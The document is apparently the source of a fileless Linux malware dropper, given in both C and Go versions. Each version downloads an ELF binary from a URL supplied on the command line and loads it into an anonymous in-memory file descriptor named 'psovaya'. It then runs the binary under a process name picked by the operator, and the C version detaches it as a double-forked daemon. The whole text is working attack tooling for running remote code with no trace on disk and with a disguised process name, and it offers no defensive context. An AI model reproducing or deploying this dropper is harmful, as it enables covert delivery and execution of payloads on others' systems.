File: dropper/dropper.c
/* Implementation of Dropper in C */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>  
#include <string.h> 
#include <signal.h>
#include <sys/mman.h>
#include <curl/curl.h>
#include <sys/stat.h>

int create_memfd(char* fd_name){
    int fd;
    printf("[+] Creating memfd\n");
    fd = memfd_create(fd_name, 0);
    if (fd == -1) {
        perror("memfd_create\n");
        exit(0);
    }
    printf("[+] fd is %d\n", fd);
    return fd;
}


void write_file(char* url, char* filepath) {
    CURL *curl;
    FILE *fp;
    CURLcode res;
    char outfilename[100];
    strcpy(outfilename, filepath);

    curl = curl_easy_init();                                                                                                                                                                                                                                                           
    if (curl) {   
        fp = fopen(outfilename,"wb");
        curl_easy_setopt(curl, CURLOPT_URL, url);
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, NULL);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
        curl_easy_setopt(curl, CURLOPT_FAILONERROR, 1L);
        
        /* Make Request */
        res = curl_easy_perform(curl);

        /* Check for Errors */
        if (res != CURLE_OK | res == CURLE_HTTP_RETURNED_ERROR ) {
            fprintf(stderr, "Curl failed: %s\n", curl_easy_strerror(res));
            curl_easy_cleanup(curl);
            fclose(fp);
            exit(0);
        }
        curl_easy_cleanup(curl);
        fclose(fp);
    }   
    return;
}


void exec_fd(int fd, char* pname, char* evp[]){
    printf("[+] Executing file\n");

    /* First Fork */
    pid_t pid = fork();
    if (pid < 0)
        exit(EXIT_FAILURE);
    if (pid > 0)
        exit(EXIT_SUCCESS);

    /* The child process becomes session leader */
    if (setsid() < 0)
        exit(EXIT_FAILURE);

    /* Catch, ignore and handle signals */
    signal(SIGCHLD, SIG_IGN);
    signal(SIGHUP, SIG_IGN);

    /* Fork off for the second time*/
    pid = fork();
    if (pid < 0)
        exit(EXIT_FAILURE);
    if (pid > 0) {
        printf("[+] Process Spawned : %d\n", (int) pid);
        exit(EXIT_SUCCESS);
    }

    /* Set new file permissions */
    umask(0);
    chdir("/");
    
    /* Execute File in Daemon Process */
    char* p_argv[] = {pname, NULL};
    fexecve(fd, p_argv, evp);

    // This should not be hit :O
    return;
}


int main(int argc, char *argv[], char * envp[]){
    /* Define Vars */
    char* fd_name = "psovaya";
    int fd_num;
    char url[1024];
    char procname[128];
    char fd_path[128];
    char* usage = "Usage : ./dropper {url} {proc_name}\n";

    /* User Input */
    if (argc != 3) {
        printf("Error : Incorrect count of Arguements\n%s", usage);
        exit(0);
    }
    strcpy(url, argv[1]);
    strcpy(procname, argv[2]);

    /* Run Dropper */
    fd_num = create_memfd(fd_name);
    int j = snprintf(fd_path, 128, "/proc/self/fd/%d", fd_num);
    write_file(url, fd_path);
    exec_fd(fd_num, procname, envp);
    return 0;
}

File: dropper/dropper.go
/*
Author - P4ral1ax
*/
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"syscall"

	"golang.org/x/sys/unix"
)

// Create a MemFd pointer
func MemfdCreate(name string) int {
	fmt.Printf("[+] Creating memfd %v\n", name)
	fd, err := unix.MemfdCreate(name, 0)
	if err != nil {
		fmt.Printf("MemfdCreate Error: %v\n", err)
		unix.Exit(0)
	}
	fmt.Printf("[+] FD is %v\n", fd)
	return fd
}

// Downloads ELF from URL
func RetrieveFile(url string) []byte {
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("Error Retrieving File : %v\n", err)
		unix.Exit(0)
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		print("Error Reading File : %v\n", err)
		unix.Exit(0)
	}
	return body
}

// Write Content
func WriteToMemfd(fd int, content []byte) {
	fmt.Printf("[+] Writing to MemFd\n")
	filepath := fmt.Sprintf("/proc/self/fd/%v", fd)
	if err := os.WriteFile(filepath, content, 0777); err != nil {
		fmt.Printf("Error Opening File: %v\n", err)
		unix.Exit(0)
	}
}

func ExecMemfd(fd int, procname string) {
	fmt.Print("[+] Executing Memfd\n")
	filepath := fmt.Sprintf("/proc/self/fd/%v", fd)
	args := [1]string{procname}
	env := os.Environ()
	attr := &syscall.ProcAttr{Dir: "/proc/self/fd", Env: env}
	pid, err := syscall.ForkExec(filepath, args[:], attr)
	if err != nil {
		fmt.Printf("Error Forking Process : %v", err)
		unix.Exit(0)
	}
	fmt.Printf("[+] PID Spawed : %v\n", pid)
}

func main() {
	// Define Usage string
	usage := "Usage : ./dropper {url} {procname}\n"
	var url string
	var procname string
	var elfContent []byte
	var fd int

	// Read In URL & Get File
	if len(os.Args[1:]) != 2 {
		fmt.Printf("Incorrect number of arguements\n%v", usage)
		unix.Exit(0)
	}
	url = os.Args[1]
	procname = os.Args[2]
	elfContent = RetrieveFile(url)

	// Create fd and Inject Code
	fd = MemfdCreate("psovaya")
	WriteToMemfd(fd, elfContent)
	ExecMemfd(fd, procname)
}
